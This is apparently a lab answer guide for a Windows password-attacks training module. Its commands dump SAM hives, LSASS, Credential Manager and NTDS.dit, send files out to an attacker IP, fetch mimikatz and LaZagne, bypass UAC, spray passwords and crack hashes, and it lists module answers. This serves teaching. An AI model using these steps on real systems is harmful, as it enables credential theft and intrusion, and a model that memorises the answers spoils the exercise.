> For the complete documentation index, see [llms.txt](https://capcap-1.gitbook.io/capcap/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://capcap-1.gitbook.io/capcap/readme/ctf-modules/exploitation/password-attacks/windows-authentication-process/questions.md).

# Questions

Use this page as a quick answer guide for the module questions.

### Attacking SAM, SYSTEM, and SECURITY

#### Where is the SAM database located in the Windows registry?

**Answer:** `HKLM\SAM`

#### Obtain the password to the `ITbackdoor` user account

1. Connect over RDP with the provided credentials.

   ```bash
   xfreerdp /u:Bob /p:HTB_@cademy_stdnt! /v:<target_ip>
   ```
2. Save the registry hives from an elevated shell.

   ```powershell
   reg.exe save hklm\sam C:\sam.save
   reg.exe save hklm\system C:\system.save
   reg.exe save hklm\security C:\security.save
   ```
3. Start an FTP server on the attacker machine.

   ```bash
   sudo python3 -m pyftpdlib --port 21 --write
   ```
4. Upload the hive files from the target.

   ```powershell
   (New-Object Net.WebClient).UploadFile('ftp://<attacker_ip>/sam.save', 'C:\sam.save')
   (New-Object Net.WebClient).UploadFile('ftp://<attacker_ip>/security.save', 'C:\security.save')
   (New-Object Net.WebClient).UploadFile('ftp://<attacker_ip>/system.save', 'C:\system.save')
   ```
5. Extract the hashes and crack the target NTLM hash.

   ```bash
   # Extract hashes
   secretsdump.py -sam sam.save -security security.save -system system.save LOCAL > hashall.txt

   # Crack the target hash
   hashcat -a 0 -m 1000 c02478537b9727d391bc80011c2e2321 /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
   ```

#### Dump the LSA secrets on the target and discover the stored credentials

Dump the LSA secrets remotely with `netexec`:

```bash
netexec smb <target_ip> --local-auth -u bob -p 'HTB_@cademy_stdnt!' --lsa
```

Then inspect the generated log file:

```bash
cat /root/.nxc/logs/lsa/FRONTDESK01_<ip>_timestamp.secrets
```

### Attacking LSASS

#### What is the name of the executable file associated with the Local Security Authority Process?

**Answer:** `lsass.exe`

#### Obtain the password to the `Vendor` user account on the target

1. Connect over RDP and dump the `lsass.exe` process.

   ```powershell
   Get-Process lsass
   rundll32 C:\windows\system32\comsvcs.dll, MiniDump <PID> C:\lsass.dmp full
   ```
2. Transfer `lsass.dmp` and parse it with `pypykatz`.

   ```bash
   pypykatz lsa minidump ./lsass.dmp | tee lsass.txt
   ```
3. Find the `Vendor` NTLM hash and crack it.

   ```bash
   hashcat -a 0 -m 1000 31f87811133bc6aaa75a536e77f64314 /usr/share/wordlists/rockyou.txt
   ```

### Attacking Windows Credential Manager

#### What password does `mcharles` use for OneDrive?

1. Log in as `sadams` over RDP and list saved credentials.

   ```cmd
   cmdkey /list
   ```
2. Spawn a shell as `mcharles` with the saved token.

   ```cmd
   runas /savecred /user:SRV01\mcharles cmd
   ```
3. Bypass UAC with `msconfig`.
   * Run `msconfig`.
   * Open the **Tools** tab.
   * Select **Command Prompt**.
   * Click **Launch**.
   * Verify access under `C:\Users\Administrator`.
4. Download and run `mimikatz.exe`.

   ```cmd
   curl --output mimikatz.exe ftp://<attacker_ip>/mimikatz.exe
   mimikatz.exe
   ```
5. Dump Credential Manager secrets from the Mimikatz prompt.

   ```
   privilege::debug
   sekurlsa::credman
   ```

### Attacking Active Directory and NTDS.dit

#### What is the name of the file stored on a domain controller that contains the password hashes?

**Answer:** `NTDS.dit`

#### Submit the NT hash associated with the `Administrator` user from the example output

**Answer:** `64f12cddaa88057e06a81b54e73b949b`

#### Obtain John Marston’s credentials

1. Scan the target and confirm it is a domain controller.

   ```bash
   nmap <target_ip> -sV -oN initial-enum
   ```

   Result: the target is a DC for `ILF.local`.
2. Generate possible usernames and validate them with `kerbrute`.

   ```bash
   # Generate usernames
   sudo ./username-anarchy -i names.txt > names_expanded.txt

   # Validate AD accounts
   ./kerbrute_linux_amd64 userenum --dc <target_ip> --domain ILF.local names_expanded.txt
   ```
3. Spray passwords against the valid `jmarston` account.

   ```bash
   netexec smb <target_ip> -u jmarston -p /usr/share/wordlists/fasttrack.txt
   ```
4. Dump `NTDS.dit` once you have valid credentials.

   ```bash
   netexec smb <target_ip> -u jmarston -p 'P@ssword!' -M ntdsutil
   ```
5. Extract the `jmarston` NTLM hash and crack it.

   ```bash
   hashcat -a 0 -m 1000 92fd67fd2f49d0e83744aa82363f021b /usr/share/wordlists/rockyou.txt
   ```

### Credential hunting in Windows

#### What password does Bob use to connect to the switches via SSH?

Connect over RDP and check Bob’s Desktop. The password is stored in plaintext in the `creds` folder inside an Excel file named `password`.

#### What is the GitLab access code Bob uses?

Check the other plaintext file in Bob’s Desktop directory.

#### What credentials does Bob use with WinSCP to connect to the file server?

Transfer `LaZagne.exe` to the target and run it to recover stored application credentials.

```cmd
curl --output LaZagne.exe ftp://<attacker_ip>/LaZagne.exe
start LaZagne.exe all
```

#### What is the default password of every newly created Inlanefreight Domain user account?

Search the system for provisioning scripts:

```cmd
cd c:\
findstr /S /I /M /C:"newuser" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml
```

This reveals a script and CSV under `C:\Users\bob\WorkStuff\`. The hardcoded SecureString payload shows the password.

**Answer:** `Inlanefreightisgreat2022`

#### What are the credentials to access the Edge-Router?

Review the Ansible playbook found during provisioning script analysis.

**Answer:** `edgeadmin:Edge@dmin123!`


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://capcap-1.gitbook.io/capcap/readme/ctf-modules/exploitation/password-attacks/windows-authentication-process/questions.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
